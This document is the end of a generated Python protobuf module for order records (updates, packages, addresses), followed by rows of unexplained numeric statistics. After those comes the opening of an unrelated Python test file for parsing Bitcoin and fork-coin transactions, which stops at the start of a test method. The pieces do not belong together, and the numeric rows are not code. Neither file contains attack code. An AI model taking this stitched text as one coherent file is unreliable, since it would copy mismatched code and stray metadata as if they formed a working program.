name='user_id', full_name='order.OrderUpdateContent.user_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='username', full_name='order.OrderUpdateContent.username', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='action', full_name='order.OrderUpdateContent.action', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='action_params', full_name='order.OrderUpdateContent.action_params', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_type', full_name='order.OrderUpdateContent.user_type', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3643,
serialized_end=3829,
)
_ORDERUPDATEACTIONPARAMS_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.OrderUpdateActionParams.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderUpdateActionParams.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderUpdateActionParams.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=535,
serialized_end=580,
)
_ORDERUPDATEACTIONPARAMS = _descriptor.Descriptor(
name='OrderUpdateActionParams',
full_name='order.OrderUpdateActionParams',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='review_method', full_name='order.OrderUpdateActionParams.review_method', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='review_remark', full_name='order.OrderUpdateActionParams.review_remark', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cancel_reason', full_name='order.OrderUpdateActionParams.cancel_reason', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform_remark', full_name='order.OrderUpdateActionParams.platform_remark', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seller_remark', full_name='order.OrderUpdateActionParams.seller_remark', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='str_param1', full_name='order.OrderUpdateActionParams.str_param1', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='int_param1', full_name='order.OrderUpdateActionParams.int_param1', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='return_remark', full_name='order.OrderUpdateActionParams.return_remark', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='packages', full_name='order.OrderUpdateActionParams.packages', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.OrderUpdateActionParams.labels', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='order.OrderUpdateActionParams.address', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.OrderUpdateActionParams.total_amount', index=11,
number=12, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ORDERUPDATEACTIONPARAMS_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3832,
serialized_end=4265,
)
_ORDERPACKAGEUPDATEPARAM = _descriptor.Descriptor(
name='OrderPackageUpdateParam',
full_name='order.OrderPackageUpdateParam',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item_ids', full_name='order.OrderPackageUpdateParam.item_ids', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logistics_company_id', full_name='order.OrderPackageUpdateParam.logistics_company_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tracking_no', full_name='order.OrderPackageUpdateParam.tracking_no', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4267,
serialized_end=4361,
)
_ORDERADDRESSUPDATEPARAM = _descriptor.Descriptor(
name='OrderAddressUpdateParam',
full_name='order.OrderAddressUpdateParam',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='order.OrderAddressUpdateParam.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile', full_name='order.OrderAddressUpdateParam.mobile', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.OrderAddressUpdateParam.country', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='order.OrderAddressUpdateParam.state', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='city', full_name='order.OrderAddressUpdateParam.city', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='district', full_name='order.OrderAddressUpdateParam.district', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ward', full_name='order.OrderAddressUpdateParam.ward', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='detail', full_name='order.OrderAddressUpdateParam.detail', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='postcode', full_name='order.OrderAddressUpdateParam.postcode', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='email', full_name='order.OrderAddressUpdateParam.email', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='recharge_phone', full_name='order.OrderAddressUpdateParam.recharge_phone', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4364,
serialized_end=4570,
)
_ORDERCREATEREQ.fields_by_name['orders'].message_type = _ORDERCREATEINFO
_ORDERCREATEINFO_LABELSENTRY.containing_type = _ORDERCREATEINFO
_ORDERCREATEINFO.fields_by_name['order_items'].message_type = _ORDERITEMCREATEINFO
_ORDERCREATEINFO.fields_by_name['address'].message_type = _ORDERADDRESSCREATEINFO
_ORDERCREATEINFO.fields_by_name['labels'].message_type = _ORDERCREATEINFO_LABELSENTRY
_ORDERCREATEINFO.fields_by_name['discounts'].message_type = _ORDERDISCOUNTCREATEINFO
_ORDERDISCOUNTCREATEINFO.fields_by_name['discount_info'].message_type = _ORDERDISCOUNTINFO
_ORDERLISTRESULT.fields_by_name['data'].message_type = _ORDER
_ORDERLISTRESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_ORDERCREATERESULT.fields_by_name['orders'].message_type = _ORDER
_ORDERCREATERESULT.fields_by_name['errors'].message_type = _CREATEORDERERROR
_ORDERCREATERESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_MERCHANTORDERCREATEREQ_LABELSENTRY.containing_type = _MERCHANTORDERCREATEREQ
_MERCHANTORDERCREATEREQ.fields_by_name['labels'].message_type = _MERCHANTORDERCREATEREQ_LABELSENTRY
_MERCHANTORDERCREATEREQ.fields_by_name['discounts'].message_type = _ORDERDISCOUNTCREATEINFO
_MERCHANTORDERCREATERESULT.fields_by_name['code'].enum_type = code__pb2._CODE
_MERCHANTORDERCREATERESULT.fields_by_name['order'].message_type = _ORDER
_ORDER_LABELSENTRY.containing_type = _ORDER
_ORDER.fields_by_name['review_info'].message_type = order__review__pb2._ORDERREVIEWINFO
_ORDER.fields_by_name['items'].message_type = _ORDERITEM
_ORDER.fields_by_name['address'].message_type = _ORDERADDRESS
_ORDER.fields_by_name['labels'].message_type = _ORDER_LABELSENTRY
_ORDER.fields_by_name['settlements'].message_type = order__settlement__pb2._ORDERSETTLEMENTV2
_ORDERITEM_SKUPROPENTRY.containing_type = _ORDERITEM
_ORDERITEM_LABELSENTRY.containing_type = _ORDERITEM
_ORDERITEM.fields_by_name['sku_prop'].message_type = _ORDERITEM_SKUPROPENTRY
_ORDERITEM.fields_by_name['labels'].message_type = _ORDERITEM_LABELSENTRY
_ORDERITEM.fields_by_name['gradient_rebate_rates'].message_type = settlement__pb2._GRADIENTREBATERATE
_ORDERUPDATECONTENT.fields_by_name['action_params'].message_type = _ORDERUPDATEACTIONPARAMS
_ORDERUPDATEACTIONPARAMS_LABELSENTRY.containing_type = _ORDERUPDATEACTIONPARAMS
_ORDERUPDATEACTIONPARAMS.fields_by_name['packages'].message_type = _ORDERPACKAGEUPDATEPARAM
_ORDERUPDATEACTIONPARAMS.fields_by_name['labels'].message_type = _ORDERUPDATEACTIONPARAMS_LABELSENTRY
_ORDERUPDATEACTIONPARAMS.fields_by_name['address'].message_type = _ORDERADDRESSUPDATEPARAM
DESCRIPTOR.message_types_by_name['OrderCreateReq'] = _ORDERCREATEREQ
DESCRIPTOR.message_types_by_name['OrderCreateInfo'] = _ORDERCREATEINFO
DESCRIPTOR.message_types_by_name['OrderItemCreateInfo'] = _ORDERITEMCREATEINFO
DESCRIPTOR.message_types_by_name['OrderAddressCreateInfo'] = _ORDERADDRESSCREATEINFO
DESCRIPTOR.message_types_by_name['OrderDiscountCreateInfo'] = _ORDERDISCOUNTCREATEINFO
DESCRIPTOR.message_types_by_name['OrderDiscountInfo'] = _ORDERDISCOUNTINFO
DESCRIPTOR.message_types_by_name['OrderListResult'] = _ORDERLISTRESULT
DESCRIPTOR.message_types_by_name['OrderCreateResult'] = _ORDERCREATERESULT
DESCRIPTOR.message_types_by_name['CreateOrderError'] = _CREATEORDERERROR
DESCRIPTOR.message_types_by_name['MerchantOrderCreateReq'] = _MERCHANTORDERCREATEREQ
DESCRIPTOR.message_types_by_name['MerchantOrderCreateResult'] = _MERCHANTORDERCREATERESULT
DESCRIPTOR.message_types_by_name['Order'] = _ORDER
DESCRIPTOR.message_types_by_name['OrderItem'] = _ORDERITEM
DESCRIPTOR.message_types_by_name['OrderAddress'] = _ORDERADDRESS
DESCRIPTOR.message_types_by_name['OrderUpdateContent'] = _ORDERUPDATECONTENT
DESCRIPTOR.message_types_by_name['OrderUpdateActionParams'] = _ORDERUPDATEACTIONPARAMS
DESCRIPTOR.message_types_by_name['OrderPackageUpdateParam'] = _ORDERPACKAGEUPDATEPARAM
DESCRIPTOR.message_types_by_name['OrderAddressUpdateParam'] = _ORDERADDRESSUPDATEPARAM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OrderCreateReq = _reflection.GeneratedProtocolMessageType('OrderCreateReq', (_message.Message,), {
'DESCRIPTOR' : _ORDERCREATEREQ,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderCreateReq)
})
_sym_db.RegisterMessage(OrderCreateReq)
OrderCreateInfo = _reflection.GeneratedProtocolMessageType('OrderCreateInfo', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _ORDERCREATEINFO_LABELSENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderCreateInfo.LabelsEntry)
})
,
'DESCRIPTOR' : _ORDERCREATEINFO,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderCreateInfo)
})
_sym_db.RegisterMessage(OrderCreateInfo)
_sym_db.RegisterMessage(OrderCreateInfo.LabelsEntry)
OrderItemCreateInfo = _reflection.GeneratedProtocolMessageType('OrderItemCreateInfo', (_message.Message,), {
'DESCRIPTOR' : _ORDERITEMCREATEINFO,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderItemCreateInfo)
})
_sym_db.RegisterMessage(OrderItemCreateInfo)
OrderAddressCreateInfo = _reflection.GeneratedProtocolMessageType('OrderAddressCreateInfo', (_message.Message,), {
'DESCRIPTOR' : _ORDERADDRESSCREATEINFO,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderAddressCreateInfo)
})
_sym_db.RegisterMessage(OrderAddressCreateInfo)
OrderDiscountCreateInfo = _reflection.GeneratedProtocolMessageType('OrderDiscountCreateInfo', (_message.Message,), {
'DESCRIPTOR' : _ORDERDISCOUNTCREATEINFO,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderDiscountCreateInfo)
})
_sym_db.RegisterMessage(OrderDiscountCreateInfo)
OrderDiscountInfo = _reflection.GeneratedProtocolMessageType('OrderDiscountInfo', (_message.Message,), {
'DESCRIPTOR' : _ORDERDISCOUNTINFO,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderDiscountInfo)
})
_sym_db.RegisterMessage(OrderDiscountInfo)
OrderListResult = _reflection.GeneratedProtocolMessageType('OrderListResult', (_message.Message,), {
'DESCRIPTOR' : _ORDERLISTRESULT,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderListResult)
})
_sym_db.RegisterMessage(OrderListResult)
OrderCreateResult = _reflection.GeneratedProtocolMessageType('OrderCreateResult', (_message.Message,), {
'DESCRIPTOR' : _ORDERCREATERESULT,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderCreateResult)
})
_sym_db.RegisterMessage(OrderCreateResult)
CreateOrderError = _reflection.GeneratedProtocolMessageType('CreateOrderError', (_message.Message,), {
'DESCRIPTOR' : _CREATEORDERERROR,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.CreateOrderError)
})
_sym_db.RegisterMessage(CreateOrderError)
MerchantOrderCreateReq = _reflection.GeneratedProtocolMessageType('MerchantOrderCreateReq', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _MERCHANTORDERCREATEREQ_LABELSENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.MerchantOrderCreateReq.LabelsEntry)
})
,
'DESCRIPTOR' : _MERCHANTORDERCREATEREQ,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.MerchantOrderCreateReq)
})
_sym_db.RegisterMessage(MerchantOrderCreateReq)
_sym_db.RegisterMessage(MerchantOrderCreateReq.LabelsEntry)
MerchantOrderCreateResult = _reflection.GeneratedProtocolMessageType('MerchantOrderCreateResult', (_message.Message,), {
'DESCRIPTOR' : _MERCHANTORDERCREATERESULT,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.MerchantOrderCreateResult)
})
_sym_db.RegisterMessage(MerchantOrderCreateResult)
Order = _reflection.GeneratedProtocolMessageType('Order', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _ORDER_LABELSENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.Order.LabelsEntry)
})
,
'DESCRIPTOR' : _ORDER,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.Order)
})
_sym_db.RegisterMessage(Order)
_sym_db.RegisterMessage(Order.LabelsEntry)
OrderItem = _reflection.GeneratedProtocolMessageType('OrderItem', (_message.Message,), {
'SkuPropEntry' : _reflection.GeneratedProtocolMessageType('SkuPropEntry', (_message.Message,), {
'DESCRIPTOR' : _ORDERITEM_SKUPROPENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderItem.SkuPropEntry)
})
,
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _ORDERITEM_LABELSENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderItem.LabelsEntry)
})
,
'DESCRIPTOR' : _ORDERITEM,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderItem)
})
_sym_db.RegisterMessage(OrderItem)
_sym_db.RegisterMessage(OrderItem.SkuPropEntry)
_sym_db.RegisterMessage(OrderItem.LabelsEntry)
OrderAddress = _reflection.GeneratedProtocolMessageType('OrderAddress', (_message.Message,), {
'DESCRIPTOR' : _ORDERADDRESS,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderAddress)
})
_sym_db.RegisterMessage(OrderAddress)
OrderUpdateContent = _reflection.GeneratedProtocolMessageType('OrderUpdateContent', (_message.Message,), {
'DESCRIPTOR' : _ORDERUPDATECONTENT,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderUpdateContent)
})
_sym_db.RegisterMessage(OrderUpdateContent)
OrderUpdateActionParams = _reflection.GeneratedProtocolMessageType('OrderUpdateActionParams', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _ORDERUPDATEACTIONPARAMS_LABELSENTRY,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderUpdateActionParams.LabelsEntry)
})
,
'DESCRIPTOR' : _ORDERUPDATEACTIONPARAMS,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderUpdateActionParams)
})
_sym_db.RegisterMessage(OrderUpdateActionParams)
_sym_db.RegisterMessage(OrderUpdateActionParams.LabelsEntry)
OrderPackageUpdateParam = _reflection.GeneratedProtocolMessageType('OrderPackageUpdateParam', (_message.Message,), {
'DESCRIPTOR' : _ORDERPACKAGEUPDATEPARAM,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderPackageUpdateParam)
})
_sym_db.RegisterMessage(OrderPackageUpdateParam)
OrderAddressUpdateParam = _reflection.GeneratedProtocolMessageType('OrderAddressUpdateParam', (_message.Message,), {
'DESCRIPTOR' : _ORDERADDRESSUPDATEPARAM,
'__module__' : 'order_pb2'
# @@protoc_insertion_point(class_scope:order.OrderAddressUpdateParam)
})
_sym_db.RegisterMessage(OrderAddressUpdateParam)
DESCRIPTOR._options = None
_ORDERCREATEINFO_LABELSENTRY._options = None
_MERCHANTORDERCREATEREQ_LABELSENTRY._options = None
_ORDER_LABELSENTRY._options = None
_ORDERITEM_SKUPROPENTRY._options = None
_ORDERITEM_LABELSENTRY._options = None
_ORDERITEM.fields_by_name['user_rebate_rate']._options = None
_ORDERITEM.fields_by_name['merchant_apportion_rebate_rate']._options = None
_ORDERITEM.fields_by_name['platform_apportion_rebate_rate']._options = None
_ORDERUPDATEACTIONPARAMS_LABELSENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 50.857419
| 8,624
| 0.752518
| 13,659
| 105,224
| 5.482905
| 0.031261
| 0.057684
| 0.087527
| 0.071023
| 0.806879
| 0.765112
| 0.750317
| 0.739234
| 0.72452
| 0.7066
| 0
| 0.039696
| 0.122814
| 105,224
| 2,068
| 8,625
| 50.882012
| 0.771682
| 0.016707
| 0
| 0.744648
| 1
| 0.003058
| 0.145632
| 0.105712
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004077
| 0
| 0.004077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fca26d622ffde8796ac42ef4ee97225b77d45f35
| 30,673
|
py
|
Python
|
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
tx_test.py
|
benharold/hardforkhelp
|
5300f68847a56451a7272dc345e3c9a3109170c7
|
[
"MIT"
] | null | null | null |
from binascii import hexlify, unhexlify
from io import BytesIO
from unittest import TestCase
from ecc import PrivateKey, S256Point, Signature
from helper import (
p2pkh_script,
SIGHASH_ALL,
)
from script import Script
from tx import Tx, TxIn, TxOut, BCDTx, BTGTx, SBTCTx, BCHTx, B2XTx
class TxTest(TestCase):
@classmethod
def tearDownClass(cls):
if TxIn.mainnet_socket is not None:
TxIn.mainnet_socket.close()
TxIn.mainnet_socket = None
if TxIn.testnet_socket is not None:
TxIn.testnet_socket.close()
TxIn.testnet_socket = None
if Tx.mainnet_socket is not None:
Tx.mainnet_socket.close()
Tx.mainnet_socket = None
if Tx.testnet_socket is not None:
Tx.testnet_socket.close()
Tx.testnet_socket = None
def test_parse_version(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.version, 1)
def test_parse_inputs(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(len(tx.tx_ins), 1)
want = unhexlify('d1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81')
self.assertEqual(tx.tx_ins[0].prev_tx, want)
self.assertEqual(tx.tx_ins[0].prev_index, 0)
want = unhexlify('483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278a')
self.assertEqual(tx.tx_ins[0].script_sig.serialize(), want)
self.assertEqual(tx.tx_ins[0].sequence, 0xfffffffe)
def test_parse_outputs(self):
